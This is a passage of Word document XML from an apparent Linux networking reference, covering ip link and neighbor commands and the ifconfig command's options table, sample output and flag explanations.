        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Routing traffic to specific networks through a gateway.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADF59B2" w14:textId="0358E60E" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Bring interface up/down</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0580D164"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p link set eth0 up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EDA6FF"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p link set eth0 down</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2C4AEB" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Activating or deactivating network interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574301BF" w14:textId="7F848B36" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Display ARP/neighbor table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A6D746" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552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7552F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ip neigh show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9D7EEE" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441B5CE2"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192.168.1.1 dev eth0 lladdr aa:bb:cc:dd:ee:ff REACHABLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C71D92"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192.168.1.10 dev eth0 lladdr 11:22:33:44:55:66 STALE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C65137"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fe80::1 dev eth0 lladdr aa:bb:cc:dd:ee:ff router REACHABLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08268965" w14:textId="1A98929E" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49719612" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> command is the traditional tool for configuring network interfaces, though it's being phased out in favor of the </w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25971B17" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F70012" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:t>Configure and display network interface parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECA8DA8" w14:textId="6FE5C5E4" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA914B7"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ifconfig [interface] [options]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708C6A2C" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Common Options</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2295"/>
        <w:gridCol w:w="4271"/>
      </w:tblGrid>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="27B27816" w14:textId="77777777" w:rsidTr="004F482C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55D214F1" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Option</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="777A3E3C" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="5363FF5C" w14:textId="77777777" w:rsidTr="004F482C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04B5BA3D"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up</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AB66C42" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Activate the interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="399E93B0" w14:textId="77777777" w:rsidTr="004F482C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E484F07"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down</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="770C9AE1" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Deactivate the interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="51B19CDE" w14:textId="77777777" w:rsidTr="004F482C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13949AC9"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netmask addr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4702CE50" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Set the subnet mask</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="525408B8" w14:textId="77777777" w:rsidTr="004F482C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25DBC744"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broadcast addr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B7854A4" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Set the broadcast address</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="63DFCDAE" w14:textId="77777777" w:rsidTr="004F482C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CDF5F78"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pointopoint addr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="205E7CA0" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Set point-to-point address</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="385E21F3" w14:textId="77777777" w:rsidTr="004F482C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BE277F6"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hw class address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A20D37C" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Set hardware address</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="323471AE" w14:textId="77777777" w:rsidTr="004F482C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E494252"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mtu N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B81EB81" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Set Maximum Transfer Unit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="49C77448" w14:textId="77777777" w:rsidTr="004F482C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20F9F46F"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dstaddr addr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30230018" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Set destination address for point-to-point</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="044A6510" w14:textId="77777777" w:rsidTr="004F482C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03C4C6A7"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tunnel aa.bb.cc.dd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F0595A3" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Create tunnel to given address</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="7489ABC3" w14:textId="77777777" w:rsidTr="004F482C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3513B7EF"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irq addr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50840A3D" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Set interrupt line</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="07AD6B4F" w14:textId="77777777" w:rsidTr="004F482C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="608F3D5E"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io_addr addr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72321DC8" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Set start address in I/O space</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="5E2B2BA5" w14:textId="77777777" w:rsidTr="004F482C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22FA6DAC"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mem_start addr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C4E2D42" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Set start address for shared memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="744077F0" w14:textId="77777777" w:rsidTr="004F482C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39363DB8"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media type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70EAA172" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Set physical port or medium type</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="265F4A44" w14:textId="77777777" w:rsidTr="004F482C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6846372F"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promisc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68BFEFCC" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Enable/disable promiscuous mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="37839CF7" w14:textId="77777777" w:rsidTr="004F482C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30B0CE6C"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allmulti</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09EBD629" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Enable/disable all-multicast mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="3FC1F54D" w14:textId="77777777" w:rsidTr="004F482C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F2980CD"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broadcast</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="063F26D9" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Enable/disable broadcast flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="2456F51E" w14:textId="77777777" w:rsidTr="004F482C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EEC53BB"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arp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B54EEB9" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Enable/disable ARP protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3706456F" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Examples and Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A27C62" w14:textId="1B3B968D" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Display all interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228A72E7"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ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3466BD58" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647AA000"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eth0: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F590155"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inet 192.168.1.100  netmask 255.255.255.0  broadcast 192.168.1.255</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2494F1D9"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inet6 fe80::5054:ff:fe12:3456  prefixlen 64  scopeid 0x20&lt;link&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010ECEC1"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ether 52:54:00:12:34:56  txqueuelen 1000  (Ethernet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301E6914"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RX packets 12845  bytes 15234567 (14.5 MiB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B1E921"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RX errors 0  dropped 0  overruns 0  frame 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59495331"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TX packets 8967  bytes 1234567 (1.1 MiB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0969D5"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TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2E0F9C"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0B1997A3"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lo: flags=73&lt;UP,LOOPBACK,RUNNING&gt;  mtu 65536</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDAF206"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inet 127.0.0.1  netmask 255.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D83B7A8"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inet6 ::1  prefixlen 128  scopeid 0x10&lt;host&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01297C08"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loop  txqueuelen 1000  (Local Loopback)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F87E3C6"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RX packets 234  bytes 23456 (22.9 KiB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B39E47F"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RX errors 0  dropped 0  overruns 0  frame 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FF98A4"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TX packets 234  bytes 23456 (22.9 KiB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568FAC1F"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xml:space="preserve">        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CB1001" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6931E208" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Interface status flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B94DC9" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="104"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>UP: Interface is active</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E9DBAF" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="104"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>BROADCAST: Supports broadcast packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9D7CDF" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="104"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>RUNNING: Interface is operational</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CC6EF9" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="104"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>MULTICAST: Supports multicast packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCA18E0" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
